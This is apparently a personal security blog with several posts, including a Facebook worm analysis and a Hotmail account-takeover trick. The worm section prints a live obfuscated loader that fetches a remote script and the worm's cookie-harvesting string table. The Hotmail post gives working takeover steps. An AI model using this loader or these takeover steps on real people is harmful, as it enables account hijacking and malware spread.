Security

SSH known host on OSX

To manage the machines and test computers on my local network I use SSH, and often, after reinstalling a test machine, when I try to connect back over SSH my Mac just throws this message at me:

noktec:release Noktec$ ssh xavier@192.168.0.2
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
********************************
Please contact your system administrator.
Add correct host key in /Users/Noktec/.ssh/known_hosts to get rid of this message.
Offending key in /Users/Noktec/.ssh/known_hosts:12
RSA host key for 192.168.0.2 has changed and you have requested strict checking.
Host key verification failed.

I find this message quite annoying, but I know the commands to deal with it. Today, while speaking with a friend, he told me that he usually deletes the SSH keys by hand in his « known_hosts » file. As there are proper commands to do this, I thought it would be a good idea to post them on my blog, and here they are:

ssh-keygen -R machine-name
ssh-keygen -R 192.168.0.2
ssh-keygen -R MyMachine.com

And that's it: the host key is removed from « known_hosts » without having to edit the file by hand.

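What `ssh-keygen -R` does under the hood, as an added Python example (this is not code from the post): it reads `known_hosts`, drops every line whose host field refers to the given name or address, and keeps the rest. The interesting case is a client with `HashKnownHosts yes`, where the host field is stored as `|1|base64(salt)|base64(HMAC-SHA1(salt, host))`; such an entry can only be found by recomputing the HMAC with the stored salt, which is exactly what the function below does. The sample file is constructed here and the keys are placeholders, not real public keys. One check before removing anything: the warning above is exactly what a genuine man-in-the-middle looks like, so confirm that the reinstall explains the new key by comparing the fingerprint ssh shows with `ssh-keygen -lf /etc/ssh/ssh_host_rsa_key.pub` run on the freshly installed machine's console.

```python
import base64
import hashlib
import hmac


def hash_hostname(host, salt):
    """Produce the hashed host field OpenSSH writes when HashKnownHosts is on:
    "|1|" + base64(salt) + "|" + base64(HMAC-SHA1(salt, host)).
    Hashing hides which hosts you talk to from anyone reading the file,
    but every entry can still be tested against a candidate name."""
    mac = hmac.new(salt, host.encode(), hashlib.sha1).digest()
    return "|1|%s|%s" % (base64.b64encode(salt).decode(), base64.b64encode(mac).decode())


def entry_matches(host_field, target):
    """True if the host field of one known_hosts line refers to `target`.
    Plain fields are a comma-separated list ("host,10.0.0.5", "[host]:2222");
    hashed fields start with "|1|" and are matched by recomputing the HMAC.
    Wildcard patterns such as *.example.com are not expanded here."""
    if host_field.startswith("|1|"):
        parts = host_field.split("|")
        if len(parts) != 4:
            return False
        try:
            salt = base64.b64decode(parts[2])
        except ValueError:
            return False
        return hmac.compare_digest(hash_hostname(target, salt), host_field)
    return target in host_field.split(",")


def purge_host(known_hosts_text, target):
    """Return (new_text, removed_line_numbers): the file content without the
    entries for `target`, plus the 1-based line numbers that were dropped.
    ssh reports the same number in "Offending key in .../known_hosts:N".
    Comments and blank lines are preserved."""
    kept, removed = [], []
    for lineno, line in enumerate(known_hosts_text.splitlines(), start=1):
        fields = line.split()
        if fields and fields[0].startswith("@"):   # "@cert-authority" / "@revoked" markers
            fields = fields[1:]
        if fields and not fields[0].startswith("#") and entry_matches(fields[0], target):
            removed.append(lineno)
        else:
            kept.append(line)
    return "\n".join(kept) + "\n", removed


# Constructed sample (keys are placeholders, not real public keys). Line 4 is the
# hashed form of the same 192.168.0.2 entry, as a client with HashKnownHosts=yes
# would have written it; the salt is fixed here so the sample is reproducible.
DEMO_SALT = bytes(range(20))
SAMPLE_KNOWN_HOSTS = "\n".join([
    "# constructed sample known_hosts",
    "192.168.0.2 ssh-rsa AAAAB3NzaC1yc2E...PLACEHOLDER",
    "fileserver,192.168.0.3 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5...PLACEHOLDER",
    hash_hostname("192.168.0.2", DEMO_SALT) + " ssh-rsa AAAAB3NzaC1yc2E...PLACEHOLDER",
    "@revoked 192.168.0.9 ssh-rsa AAAAB3NzaC1yc2E...PLACEHOLDER",
])

if __name__ == "__main__":
    new_text, gone = purge_host(SAMPLE_KNOWN_HOSTS, "192.168.0.2")
    print("removed lines:", gone)     # both the plain and the hashed entry
    print(new_text)
```

Unlike this script, the real `ssh-keygen -R` also leaves a copy of the previous file as `known_hosts.old`, which is worth keeping until you are sure the key change was legitimate.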

Installing Gerix on Ubuntu from Backtrack’s repository

Gerix Wifi Cracker is a GUI for the Aircrack-ng suite, designed for real-world pentesting with an efficient and user-friendly graphical interface.

Note: this small tutorial is based on the repositories of BackTrack 5 R1 and Ubuntu 11.10.

The first step is to add these lines to « /etc/apt/sources.list »:

deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing

deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing

deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing

Once those lines are added to the sources.list file, you can run the command below. Keep in mind that this makes apt trust BackTrack's packages and signing key on your Ubuntu system, and that packages from a foreign repository can pull in library versions that conflict with Ubuntu's own.

$ sudo apt-get update 

And finally, to install Gerix, run this last command:

$ sudo apt-get install gerix-wifi-cracker-ng 

And that's it.

This Blog supports the Blackout operation and is against SOPA/PIPA

The USA is about to vote on restrictive bills called SOPA and PIPA.

These bills will allow the US government to censor websites.

To understand SOPA/PIPA, I invite you to read the following paper:

http://blog.reddit.com/2012/01/technical-examination-of-sopa-and.html

and to have a look at the following video from the Anonymous group.

I also invite you to retweet the following link: http://sopastrike.com/on-strike/

See you soon.

« Hacking » Friends Hotmail’s Accounts

There are a few existing ways of hacking a Hotmail account, such as brute force or the secret question/answer, but today I (and some friends) found another « way » of doing it that I had never heard of before.

Long story short :

To make it work, the hacker needs to know the « save » e-mail address (the alternate address to which reset links are sent), and hope that this address has been deleted.

When you have forgotten your password, it is possible to ask Hotmail to « Email me a reset link ». When clicking on this option, Hotmail shows the user the e-mail address to which it is going to send the reset link, for example:

my*****@hotmail.com

But in a few cases, this e-mail address might already have been deleted by Hotmail (if you, or the target, did not use it anymore). To verify that, the hacker can simply go back to the following link:

« Can’t access your account » (on the sign-in page)

From there the hacker can tick the « I forgot my password » radio button; following the link, the hacker will find the page displayed below:
And here comes the trick:

IF the address does not exist anymore, the hacker will receive the following message:


If Hotmail returns this message, the trick is to « recreate » this e-mail address by creating a new account with it, and then reset the password of the account you wanted to get into in the first place.

And that's it: Hotmail does not verify whether the previous e-mail address had been deleted or not; it simply sends you the password reset link. The lesson for users is that a recovery address you let expire is a way into your account: keep it registered and under your control, or remove it from the account.

Have fun.

Encrypted Folder on Mac OS X

Today a friend of mine told me that while he was travelling his laptop was stolen. Unfortunately for him, it was his work laptop, containing all his data, projects, presentations and some client data. Fortunately, he told me that the laptop was using TrueCrypt, that all the files on the laptop were encrypted and that no one would be able to use the laptop without his consent.

After this small conversation, I began to freak out about my Mac being stolen and my projects and personal data being published on the internet, so I decided to encrypt my drive. My first thought was to use TrueCrypt or FileVault on my Mac, but I wasn't sure I liked the fact that my whole drive would be encrypted and that I would not be able to use forensic methods if my drive crashed. Therefore I finally decided to create an encrypted folder on my Mac.

This is the way of doing it step by step:

  • On your desktop create the folder that you want to encrypt ( in my case « Projects »)
  • Open the Application folder and open the Utilities folder
  • Open the Disk Utility application

From an existing folder:

In the Disk Utility application:

  • Go to « File » -> « Disk Image From Folder »
  • Choose the folder you want to encrypt (in my case « Projects »)
  • Choose the encryption (the stronger the better): AES 256-bit
  • Enter your passphrase (PLEASE do not use 5 characters!) *
  • Click on
  • The process of creating your encrypted folder will begin.

From a non-existing folder:

As you may see, the folder is an image (Projects.img), which means that you can mount and unmount the encrypted image or even copy it to a USB drive.

  • Go to « File » -> « Blank Disk Image »

[Screenshot: Encrypted Disk Image]

  • Choose the size (I took 8.3 GB)
  • Choose the encryption (AES 256-bit)
  • Click on Create
  • Enter your passphrase

You will now find an encrypted disk image on your Desktop at any time, and when you click on it, it will ask you for the passphrase to open it.

And that's it.

* The strength of a password relies on:

  • the letters you use (A-Z, a-z)
  • the digits you use (0-9)
  • the special characters (@, /, !, #, etc.)
  • BUT ALSO on its length

Using a password like « ABd2@ » will in any case be less secure than using « ThisIsMyPasswordAndILikeToWearLargeJeansBecauseMyFavoriteNumberIs42 », so please consider using a nice, long and secure password.

Patch WordPress UserName Disclosure

On May 26th, a researcher (Veronica Valero of Talsoft S.R.L.) posted a security advisory about a direct object reference affecting WordPress blogs.

A reply posted by « Zerial » on the mailing list explained another vulnerability in WordPress.

It is possible, via a simple test on the login box, to know whether a username is in use on the blog. The test is pretty simple: it analyses the message returned when trying to log in to WordPress.

For example, on the following website (http://www.noktec.be/wp-admin/), when trying to log in with the user name « test » (fake):

The message returned when the account was active was:

Error: The password you entered for the username test is incorrect. Lost your password ?

The message returned when the account was not active was:

Error: Invalid username. Lost your password ?

This vulnerability had already been reported as OSVDB 55713 in 2009 but was still present.

A patch was released by « EthicalHack3r »:

wp-includes/user.php:91

Change:

return new WP_Error('invalid_username', sprintf(__('ERROR: Invalid username. <a href="%s">Lost your password</a>?'), site_url('wp-login.php?action=lostpassword', 'login')));

To:

return new WP_Error( 'invalid_username', sprintf( __( 'ERROR: Invalid username and/or password.')));

and change

wp-includes/user.php:111

Change:

return new WP_Error( 'incorrect_password', sprintf( __( 'ERROR: The password you entered for the username %1$s is incorrect. <a href="%2$s">Lost your password</a>?' ), $username, wp_lostpassword_url() ) );

To:

return new WP_Error( 'incorrect_password', sprintf( __( 'ERROR: Invalid username and/or password.')));

(source: EthicalHack3r)
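The username oracle and its fix, as an added Python example (not code from the post or from WordPress): `login_before_patch` returns the two distinct messages quoted above, `login_after_patch` returns the single message from the patch, and `leaks_username` is the test from the post written as a function, so the same check can be run against any login routine. The user table, the salt and the hash function are constructed for the demo; WordPress itself uses phpass, and the messages are the post's with the HTML link stripped.

```python
import hashlib
import hmac


def _digest(password, salt="constructed-salt"):
    """Stand-in for the real password hash (WordPress uses phpass); enough for the demo."""
    return hashlib.sha256((salt + password).encode()).hexdigest()


# Constructed accounts; "test" deliberately does not exist, as in the post.
USERS = {"admin": _digest("correct horse"), "editor": _digest("battery staple")}

# The three messages quoted in the post (HTML link stripped).
MSG_NO_USER = "ERROR: Invalid username. Lost your password?"
MSG_BAD_PASSWORD = "ERROR: The password you entered for the username %s is incorrect. Lost your password?"
MSG_UNIFORM = "ERROR: Invalid username and/or password."


def login_before_patch(username, password):
    """Mirrors wp-includes/user.php before the patch: two failures, two different messages.
    Returns None on success, else the error string shown to the visitor."""
    if username not in USERS:
        return MSG_NO_USER                      # tells the visitor the account does not exist
    if not hmac.compare_digest(USERS[username], _digest(password)):
        return MSG_BAD_PASSWORD % username      # tells the visitor the account does exist
    return None


def login_after_patch(username, password):
    """Mirrors the patched version: one message whichever check failed. The supplied
    password is hashed in both cases so the two failure paths do the same work, which
    also narrows the timing difference that the message fix alone does not address."""
    candidate = _digest(password)               # always computed, known user or not
    ok = username in USERS and hmac.compare_digest(USERS[username], candidate)
    return None if ok else MSG_UNIFORM


def leaks_username(login, existing_user, missing_user="test"):
    """The check from the post as a test: log in with a wrong password for a user that
    exists and for one that does not. If the responses differ, the login form is a
    username oracle."""
    return login(existing_user, "wrong-password") != login(missing_user, "wrong-password")


if __name__ == "__main__":
    print("before patch leaks:", leaks_username(login_before_patch, "admin"))   # True
    print("after patch leaks: ", leaks_username(login_after_patch, "admin"))    # False
```

The message check is what the post and the patch cover; a complete review would also compare response times for the two failure cases, since an unknown user can be rejected before any hash is computed.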

And that’s it.

FaceBook worm quick and dirty review

Introduction:

Facebook is very popular around the world, and loads of « hackers » / « script kiddies » would like to send messages to your contacts for fun and profit. In this quick and dirty review, I will briefly analyse a worm that spreads on Facebook.

Analysis:

A few minutes ago I was invited by a friend to a strange event, which told me to click on one of the following links:

  1. « http://stump.ws/rocibv ».
  2. « http://www.littleurl.net/a5264c »


This link was supposed to give you a trick to see « how many people visited your profile ». Instead you get this! (one event inviting all your friends to do the same, and a pseudo)

Once on the page, there was a field containing JavaScript, and people were asked to copy-paste it after the Facebook address, like the following: www.facebook.com/My_Malware_JS_code.


Below you may see the JavaScript code, with its strings encoded in hexadecimal (base 16):

javascript: var _0x80be=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74",
"\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74",
"\x2F\x2F\x69\x61\x62\x65\x6C\x6F\x2E\x63\x6F\x6D\x2F\x65\x2E\x6A\x73",
"\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];
(a=(b=document)[_0x80be[2]](_0x80be[1]))[_0x80be[0]]=_0x80be[3];b[_0x80be[5]][_0x80be[4]](a); void (0);

To understand a bit better what was happening, I converted the hex to characters; you may see the result below:

javascript: var _0x80be=["src","script","createElement","//iabelo.com/e.js","appendChild","body"];(a=(b=document)[_0x80be[2]](_0x80be[1]))[_0x80be[0]]=_0x80be[3];b[_0x80be[5]][_0x80be[4]](a); void (0);

Some « hackers » do not even encode the page, and it looks like this:

javascript:(a=(b=document).createElement('script')).src='//icalinko.com/styll.js',b.body.appendChild(a);void(0)
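The hex-to-characters step above, done by a small decoder rather than by hand, as an added Python example (not code from the post): it finds the `var _0x...=[...]` string table, resolves the `\xHH`, `\uHHHH` and `\n`-style escapes, inlines every `_0x80be[N]` reference into the code that follows, and rewrites `["ident"]` as `.ident`. Run on the loader quoted above (embedded below as the sample) it yields exactly the unencoded shape shown just before this block. The same function applies to the larger `_0x5c0f` table of e.js further down, provided the hex text is re-joined where the blog's line wrapping split an escape in two.

```python
import json
import re

# The obfuscated loader quoted in the post (the short one that pulls //iabelo.com/e.js).
SAMPLE = r'''javascript: var _0x80be=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74",
"\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74",
"\x2F\x2F\x69\x61\x62\x65\x6C\x6F\x2E\x63\x6F\x6D\x2F\x65\x2E\x6A\x73",
"\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];
(a=(b=document)[_0x80be[2]](_0x80be[1]))[_0x80be[0]]=_0x80be[3];b[_0x80be[5]][_0x80be[4]](a); void (0);'''

_ESCAPE = re.compile(r'\\(x[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4}|.)', re.S)
_SIMPLE = {"n": "\n", "t": "\t", "r": "\r", "0": "\0", "b": "\b", "f": "\f", "v": "\v"}


def decode_js_string(body):
    """Resolve JS escape sequences (\\xHH, \\uHHHH, \\n ...) in the raw text of a string literal."""
    def repl(m):
        esc = m.group(1)
        if len(esc) > 1:                    # \xHH or \uHHHH
            return chr(int(esc[1:], 16))
        return _SIMPLE.get(esc, esc)        # \" \' \\ \/ map to themselves
    return _ESCAPE.sub(repl, body)


# One token of a string-array literal: a "..." or '...' literal, a comma, or the closing bracket.
_TOKEN = re.compile(r'''\s*(?:"((?:\\.|[^"\\])*)"|'((?:\\.|[^'\\])*)'|(,)|(\]))''', re.S)


def parse_string_array(src, start):
    """Scan the array literal beginning at src[start] == '[' and return
    (decoded strings, index just after the closing ']'). A ']' inside a string is fine,
    which a plain regex up to the first ']' would get wrong."""
    i, out = start + 1, []
    while True:
        m = _TOKEN.match(src, i)
        if not m:
            raise ValueError("unterminated or non-string array at offset %d" % i)
        if m.group(4):                      # closing bracket
            return out, m.end()
        if m.group(3) is None:              # a string literal (either quote style)
            raw = m.group(1) if m.group(1) is not None else m.group(2)
            out.append(decode_js_string(raw))
        i = m.end()


_DECL = re.compile(r'var\s+(_0x[0-9A-Fa-f]+)\s*=\s*\[')


def deobfuscate(src):
    """Find `var _0x....=[...]`, decode its strings, then inline `name[N]` references in the
    rest of the code and turn ["ident"] into .ident so the loader reads like the plain version.
    Returns (table name, decoded strings, readable code)."""
    m = _DECL.search(src)
    if not m:
        raise ValueError("no hex string array found")
    name = m.group(1)
    strings, end = parse_string_array(src, m.end() - 1)
    rest = src[end:].lstrip(" ;\n\r\t")
    rest = re.sub(re.escape(name) + r'\[(\d+)\]',
                  lambda r: json.dumps(strings[int(r.group(1))]), rest)
    rest = re.sub(r'\["([A-Za-z_$][\w$]*)"\]', r'.\1', rest)
    return name, strings, rest.strip()


if __name__ == "__main__":
    name, strings, code = deobfuscate(SAMPLE)
    print(name, strings)
    print(code)
```

Reading the decoded table is usually enough to classify a sample like this one: a string table consisting of `createElement`, `script`, `src`, a remote URL and `appendChild` is a stage-one loader, and the URL is the indicator worth blocking.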

I'm not a JavaScript expert, but I can read code, and this looked like a call to www.iabelo.com/e.js, which loads and executes a remote JavaScript file. I copied it, and you may see part of it below (again, mostly hex-encoded). This is not the full code.

var _0x5c0f=["\x53\x61\x6C\x75\x74\x20\x25\x66\x69\x72\x73\x74\x6E\x61\x6D\x65\x25\x20\x20\x4A\x65\x20\x76\x69\x65\x6E\x73\x20\x64\x65\x20\x64\x65\x63\x6F\x75\x76\x72\x69\x72\x20\x71\x75\x65\x20\x76\x6F\x75\x73\x20\x65\x74\x69\x65\x7A\x20\x75\x6E\x20\x64\x65\x20\x6D\x65\x73\x20\x73\x70\x65\x63\x74\x61\x74\x65\x75\x72\x73\x20\x70\x72\x6F\x66\x69\x6C\x20\x68\x61\x75\x74\x2C\x20\x76\x6F\x75\x73\x20\x70\x6F\x75\x76\x65\x7A\x20\x74\x72\x6F\x75\x76\x65\x72\x20\x76\x6F\x74\x72\x65\x20\x65\x78\x65\x6D\x70\x6C\x61\x69\x72\x65\x20\x61\x20\x20\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x75\x6D\x70\x2E\x77\x73\x2F\x72\x6F\x63\x69\x62\x76","\x25\x74\x66\x25\x20\x25\x74\x66\x25\x20\x25\x74\x66\x25\x20\x25\x74\x66\x25\x20\x25\x74\x66\x25\x20\x25\x74\x66\x25\x0A\x77\x74\x66\x20\x67\x75\x79\x73\x2C\x20\x76\x6F\x75\x73\x20\x65\x73\x74\x20\x61\x70\x70\x61\x72\x75\x20\x63\x6F\x6D\x6D\x65\x20\x6C\x65\x20\x70\x65\x75\x70\x6C\x65\x20\x71\x75\x69\x20\x6D\x27\x61\x20\x6C\x65\x20\x70\x6C\x75\x73\x20\x74\x72\x61\x71\x75\x65\x2C\x20\x76\x6F\x75\x73\x20\x70\x6F\x75\x76\x65\x7A\x20\x76\x6F\x69\x72\x20\x76\x6F\x74\x72\x65\x20\x65\x78\x65\x6D\x70\x6C\x61\x69\x72\x65\x20\x61\x20\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x75\x6D\x70\x2E\x77\x73\x2F\x72\x6F\x63\x69\x62\x76","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x69\x61\x62\x65\x6C\x6F\x2E\x63\x6F\x6D\x2F\x65\x6E\x64\x2E\x70\x68\x70","\x4A\x27\x61\x69\x20\x61\x70\x70\x72\x69\x73\x20\x75\x6E\x65\x20\x66\x61\xE7\x6F\x6E\x20\x64\x65\x20\x76\x6F\x69\x72\x20\x71\x75\x69\x20\x63\x6F\x6E\x73\x75\x6C\x74\x65\x20\x76\x6F\x74\x72\x65\x20\x70\x72\x6F\x66\x69\x6C\x0A\x0A\x53\x75\x69\x76\x65\x7A\x20\x63\x65\x73\x20\xE9\x74\x61\x70\x65\x73\x20\x73\x69\x6D\x70\x6C\x65\x73\x20\x70\x6F\x75\x72\x20\x74\x72\x6F\x75\x76\x65\x72\x3A\x0A\x0A\x74\x6F\x75\x74\x20\x63\x65\x20\x71\x75\x65\x20\x76\x6F\x75\x73\x20\x61\x76\x65\x7A\x20\xE0\x20\x66\x61\x69\x72\x65\x20\x65\x73\x74\x20\x64\x27\x61\x6C\x6C\x65\x72\x20\x73\x75\x72\x20\x63\x65\x20\x6C\x69\x65\x6E\x20\x65\x74\x20\x73\x75\x69\
x76\x65\x7A\x20\x6C\x65\x73\x20\x69\x6E\x73\x74\x72\x75\x63\x74\x69\x6F\x6E\x73\x20\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x75\x6D\x70\x2E\x77\x73\x2F\x72\x6F\x63\x69\x62\x76","\x56\x6F\x69\x72\x20\x71\x75\x69\x20\x61\x20\x63\x6F\x6E\x73\x75\x6C\x74\x65\x20\x76\x6F\x74\x72\x65\x20\x70\x72\x6F\x66\x69\x6C\x21","\x56\x6F\x75\x73\x20\x64\x65\x76\x72\x69\x65\x7A\x20\x76\x72\x61\x69\x6D\x65\x6E\x74\x20\x76\x65\x72\x69\x66\x69\x65\x72\x20\x63\x65\x6C\x61\x2E\x20\x49\x6C\x20\x66\x6F\x6E\x63\x74\x69\x6F\x6E\x6E\x65\x20\x76\x72\x61\x69\x6D\x65\x6E\x74\x21","\x43\x27\x65\x73\x74\x20\x6C\x65\x20\x6E\x6F\x75\x76\x65\x61\x75\x20\x63\x6F\x64\x65\x20\x71\x75\x65\x20\x74\x6F\x75\x74\x20\x6C\x65\x20\x6D\x6F\x6E\x64\x65\x20\x61\x20\x70\x61\x72\x6C\x65\x21","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x74\x6F\x70","\x47\x45\x54","\x6F\x70\x65\x6E","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x73\x65\x6E\x64","\x2F","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x40\x5B","\x69\x64","\x3A","\x6E\x61\x6D\x65","\x5D","","\x26","\x3D","\x50\x4F\x53\x54","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x64\x69\x73\x70\x6C\x61\x79","\x73\x74\x79\x6C\x65","\x62\x6C\x6F\x63\x6B","\x70\x6F\x73\x69\x74\x69\x6F\x6E","\x61\x62\x73\x6F\x6C\x75\x74\x65","\x77\x69\x64\x74\x68","\x25","\x68\x65\x69\x67\x68\x74","\x6C\x65\x66\x74","\x70\x78","\x74\x65\x78\x74\x41\x6C\x69\x67\x6E","\x63\x65\x6E\x74\x65\x72","\x70\x61\x64\x64\x69\x6E\x67","\x34\x70\x78","\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64","\x23\x46\x46\x46\x46\x46\x46","\x7A\x49\x6E\x64\x65\x78","\x69\x6E\x6E\x65\
x72\x48\x54\x4D\x4C","\x26\x6E\x62\x73\x70\x3B\x3C\x62\x72\x2F\x3E\x50\x6C\x65\x61\x73\x65\x20\x77\x61\x69\x74\x2C\x20\x74\x68\x69\x73\x20\x63\x61\x6E\x20\x74\x61\x6B\x65\x20\x61\x20\x6C\x69\x74\x74\x6C\x65\x20\x77\x68\x69\x6C\x65\x2E\x2E\x2E\x3C\x62\x72\x2F\x3E\x3C\x62\x72\x2F\x3E\x4F\x72\x20\x69\x66\x20\x79\x6F\x75\x20\x67\x65\x74\x20\x73\x69\x63\x6B\x20\x6F\x66\x20\x77\x61\x69\x74\x69\x6E\x67\x2C\x20\x79\x6F\x75\x20\x63\x61\x6E\x20\x3C\x61\x20\x68\x72\x65\x66\x3D\x22\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x76\x6F\x69\x64\x28\x30\x29\x3B\x22\x20\x6F\x6E\x63\x6C\x69\x63\x6B\x3D\x22\x77\x66\x3D\x30\x3B\x20\x6D\x66\x28\x29\x3B\x22\x3E\x63\x6C\x69\x63\x6B\x20\x68\x65\x72\x65\x3C\x2F\x61\x3E\x20\x28\x72\x65\x73\x75\x6C\x74\x73\x20\x6D\x61\x79\x20\x62\x65\x20\x6C\x65\x73\x73\x20\x61\x63\x63\x75\x72\x61\x74\x65\x29","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x64\x61\x74\x61","\x66\x69\x72\x73\x74\x43\x68\x69\x6C\x64","\x6E\x61\x76\x41\x63\x63\x6F\x75\x6E\x74\x4E\x61\x6D\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3F","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x6F\x6F\x73\x65\x2F\x3F\x5F\x5F\x61\x3D\x31","\x65\x76\x65\x6E\x74","\x41\x73\x79\x6E\x63\x52\x65\x71\x75\x65\x73\x74","\x2F\x61\x6A\x61\x78\x2F\x74\x79\x70\x65\x61\x68\x65\x61\x64\x2F\x66\x69\x72\x73\x74\x5F\x64\x65\x67\x72\x65\x65\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31\x26\x76\x69\x65\x77\x65\x72\x3D","\x26\x74\x6F\x6B\x65\x6E\x3D","\x26\x66\x69\x6C\x74\x65\x72\x5B\x30\x5D\x3D\x75\x73\x65\x72\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x30\x5D\x3D\x66\x72\x69\x65\x6E\x64\x73\x5F\x6F\x6E\x6C\x79\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x31\x5D\x3D\x6E\x6D\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x32\x5D\x3D\x73\x6F\x72\x74\x5F\x61\x6C\x70\x68\x61","\x6C\x65\x6E\x67\x74\x68","\x70\x75\x73\x68","\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x67\x65\x74\x4D\x6F\x6E\x74\x68","\x67\x65\x74\x44\x61\x74\x65","\x67\x65\x74\x46\x75\x6C\x6C\x59\x65\x61\x72","\x67\x65\x74\x48\x6F\x7
5\x72\x73","\x2C","\x6A\x6F\x69\x6E","\x6F\x6E","\x43\x72\x65\x61\x74\x65\x20\x45\x76\x65\x6E\x74","\x6E\x65\x77","\x2F\x65\x76\x65\x6E\x74\x73\x2F\x63\x72\x65\x61\x74\x65\x2E\x70\x68\x70","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x61\x74\x2F\x62\x75\x64\x64\x79\x5F\x6C\x69\x73\x74\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x73\x75\x62\x73\x74\x72","\x28","\x29","\x62\x75\x64\x64\x79\x5F\x6C\x69\x73\x74","\x70\x61\x79\x6C\x6F\x61\x64","\x6E\x6F\x77\x41\x76\x61\x69\x6C\x61\x62\x6C\x65\x4C\x69\x73\x74","\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x25\x66\x69\x72\x73\x74\x6E\x61\x6D\x65\x25","\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x66\x69\x72\x73\x74\x4E\x61\x6D\x65","\x75\x73\x65\x72\x49\x6E\x66\x6F\x73","\x72\x65\x70\x6C\x61\x63\x65","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x61\x74\x2F\x73\x65\x6E\x64\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x2F\x61\x6A\x61\x78\x2F\x62\x72\x6F\x77\x73\x65\x72\x2F\x66\x72\x69\x65\x6E\x64\x73\x2F\x3F\x75\x69\x64\x3D","\x26\x66\x69\x6C\x74\x65\x72\x3D\x61\x6C\x6C\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x3D\x31","\x73\x68\x69\x66\x74","\x66\x65\x74\x63\x68\x65\x64\x20\x66\x72\x69\x65\x6E\x64\x73\x3A\x20","\x68\x6F\x6D\x65","\x70\x6F\x70","\x25\x74\x66\x25","\x73\x65\x61\x72\x63\x68","\x78\x68\x70\x63\x5F\x6D\x65\x73\x73\x61\x67\x65\x5F\x74\x65\x78\x74","\x78\x68\x70\x63\x5F\x6D\x65\x73\x73\x61\x67\x65","\x6D\x65\x73\x73\x61\x67\x65\x20\x74\x65\x78\x74\x3A\x20","\x2F\x61\x6A\x61\x78\x2F\x75\x70\x64\x61\x74\x65\x73\x74\x61\x74\x75\x73\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x70\x72\x6F\x66\x69\x6C\x65"]

Once decoded into readable characters, it appeared like the following:

var _0x5c0f=["Salut %firstname%  Je viens de decouvrir que vous etiez un de mes spectateurs profil haut, vous pouvez trouver votre exemplaire a  http://stump.ws/rocibv""%tf% %tf% %tf% %tf% %tf% %tf%
wtf guys, vous est apparu comme le peuple qui m'a le plus traque, vous pouvez voir votre exemplaire a http://stump.ws/rocibv""http://www.iabelo.com/end.php""J'ai appris une façon de voir qui consulte votre profil
Suivez ces étapes simples pour trouver:
tout ce que vous avez à faire est d'aller sur ce lien et suivez les instructions http://stump.ws/rocibv"

'Voir qui a consulte votre profil!"

"Vous devriez vraiment verifier cela. Il fonctionne vraiment!""C'est le nouveau code que tout le monde a parle!"

"href"

"location""top""GET"

"open"

"onreadystatechange""readyState""status""responseText"

"send"

"/"

"match""cookie""@[""id"":""name""]""""&""=""POST""Content-Type"

"application/x-www-formurlencoded""setRequestHeader""div""createElement""display"
"style""block""position""absolute""width""%""height""left""px""textAlign""center""padding""4px""background""#FFFFFF""zIndex""innerHTML"" 
Please wait, this can take a little while...

Or if you get sick of waiting, you can click here (results may be less accurate)"

